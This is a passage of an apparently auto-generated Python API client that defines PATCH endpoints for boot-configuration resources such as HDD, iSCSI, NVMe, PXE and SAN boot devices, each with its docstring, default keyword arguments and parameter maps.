'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_cdd_device':
(BootCddDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_cdd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_cdd_device
)
def __patch_boot_device_boot_mode(
self,
moid,
boot_device_boot_mode,
**kwargs
):
"""Update a 'boot.DeviceBootMode' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_device_boot_mode(moid, boot_device_boot_mode, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_device_boot_mode (BootDeviceBootMode): The 'boot.DeviceBootMode' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootMode
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_device_boot_mode'] = \
boot_device_boot_mode
return self.call_with_http_info(**kwargs)
self.patch_boot_device_boot_mode = _Endpoint(
settings={
'response_type': (BootDeviceBootMode,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
'operation_id': 'patch_boot_device_boot_mode',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_device_boot_mode',
'if_match',
],
'required': [
'moid',
'boot_device_boot_mode',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_device_boot_mode':
(BootDeviceBootMode,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_device_boot_mode': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_device_boot_mode
)
def __patch_boot_device_boot_security(
self,
moid,
boot_device_boot_security,
**kwargs
):
"""Update a 'boot.DeviceBootSecurity' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_device_boot_security(moid, boot_device_boot_security, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_device_boot_security (BootDeviceBootSecurity): The 'boot.DeviceBootSecurity' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootSecurity
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_device_boot_security'] = \
boot_device_boot_security
return self.call_with_http_info(**kwargs)
self.patch_boot_device_boot_security = _Endpoint(
settings={
'response_type': (BootDeviceBootSecurity,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
'operation_id': 'patch_boot_device_boot_security',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_device_boot_security',
'if_match',
],
'required': [
'moid',
'boot_device_boot_security',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_device_boot_security':
(BootDeviceBootSecurity,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_device_boot_security': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_device_boot_security
)
def __patch_boot_hdd_device(
self,
moid,
boot_hdd_device,
**kwargs
):
"""Update a 'boot.HddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_hdd_device(moid, boot_hdd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_hdd_device (BootHddDevice): The 'boot.HddDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootHddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_hdd_device'] = \
boot_hdd_device
return self.call_with_http_info(**kwargs)
self.patch_boot_hdd_device = _Endpoint(
settings={
'response_type': (BootHddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
'operation_id': 'patch_boot_hdd_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_hdd_device',
'if_match',
],
'required': [
'moid',
'boot_hdd_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_hdd_device':
(BootHddDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_hdd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_hdd_device
)
def __patch_boot_iscsi_device(
self,
moid,
boot_iscsi_device,
**kwargs
):
"""Update a 'boot.IscsiDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_iscsi_device(moid, boot_iscsi_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_iscsi_device (BootIscsiDevice): The 'boot.IscsiDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootIscsiDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_iscsi_device'] = \
boot_iscsi_device
return self.call_with_http_info(**kwargs)
self.patch_boot_iscsi_device = _Endpoint(
settings={
'response_type': (BootIscsiDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
'operation_id': 'patch_boot_iscsi_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_iscsi_device',
'if_match',
],
'required': [
'moid',
'boot_iscsi_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_iscsi_device':
(BootIscsiDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_iscsi_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_iscsi_device
)
def __patch_boot_nvme_device(
self,
moid,
boot_nvme_device,
**kwargs
):
"""Update a 'boot.NvmeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_nvme_device(moid, boot_nvme_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_nvme_device (BootNvmeDevice): The 'boot.NvmeDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootNvmeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_nvme_device'] = \
boot_nvme_device
return self.call_with_http_info(**kwargs)
self.patch_boot_nvme_device = _Endpoint(
settings={
'response_type': (BootNvmeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
'operation_id': 'patch_boot_nvme_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_nvme_device',
'if_match',
],
'required': [
'moid',
'boot_nvme_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_nvme_device':
(BootNvmeDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_nvme_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_nvme_device
)
def __patch_boot_pch_storage_device(
self,
moid,
boot_pch_storage_device,
**kwargs
):
"""Update a 'boot.PchStorageDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_pch_storage_device(moid, boot_pch_storage_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_pch_storage_device (BootPchStorageDevice): The 'boot.PchStorageDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPchStorageDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_pch_storage_device'] = \
boot_pch_storage_device
return self.call_with_http_info(**kwargs)
self.patch_boot_pch_storage_device = _Endpoint(
settings={
'response_type': (BootPchStorageDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
'operation_id': 'patch_boot_pch_storage_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_pch_storage_device',
'if_match',
],
'required': [
'moid',
'boot_pch_storage_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_pch_storage_device':
(BootPchStorageDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_pch_storage_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_pch_storage_device
)
def __patch_boot_precision_policy(
self,
moid,
boot_precision_policy,
**kwargs
):
"""Update a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_precision_policy(moid, boot_precision_policy, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPrecisionPolicy
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_precision_policy'] = \
boot_precision_policy
return self.call_with_http_info(**kwargs)
self.patch_boot_precision_policy = _Endpoint(
settings={
'response_type': (BootPrecisionPolicy,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
'operation_id': 'patch_boot_precision_policy',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_precision_policy',
'if_match',
],
'required': [
'moid',
'boot_precision_policy',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_precision_policy':
(BootPrecisionPolicy,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_precision_policy': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_precision_policy
)
def __patch_boot_pxe_device(
self,
moid,
boot_pxe_device,
**kwargs
):
"""Update a 'boot.PxeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_pxe_device(moid, boot_pxe_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_pxe_device (BootPxeDevice): The 'boot.PxeDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPxeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_pxe_device'] = \
boot_pxe_device
return self.call_with_http_info(**kwargs)
self.patch_boot_pxe_device = _Endpoint(
settings={
'response_type': (BootPxeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
'operation_id': 'patch_boot_pxe_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_pxe_device',
'if_match',
],
'required': [
'moid',
'boot_pxe_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_pxe_device':
(BootPxeDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_pxe_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_pxe_device
)
def __patch_boot_san_device(
self,
moid,
boot_san_device,
**kwargs
):
"""Update a 'boot.SanDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_san_device(moid, boot_san_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_san_device (BootSanDevice): The 'boot.SanDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSanDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_san_device'] = \
boot_san_device
return self.call_with_http_info(**kwargs)
self.patch_boot_san_device = _Endpoint(
settings={
'response_type': (BootSanDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
'operation_id': 'patch_boot_san_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_san_device',
'if_match',
],
'required': [
'moid',
'boot_san_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_san_device':
(BootSanDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_san_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_boot_san_device
)
def __patch_boot_sd_device(
self,
moid,
boot_sd_device,
**kwargs
):
"""Update a 'boot.SdDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_sd_device(moid, boot_sd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_sd_device (BootSdDevice): The 'boot.SdDevice' resource to update.
Keyword Args:
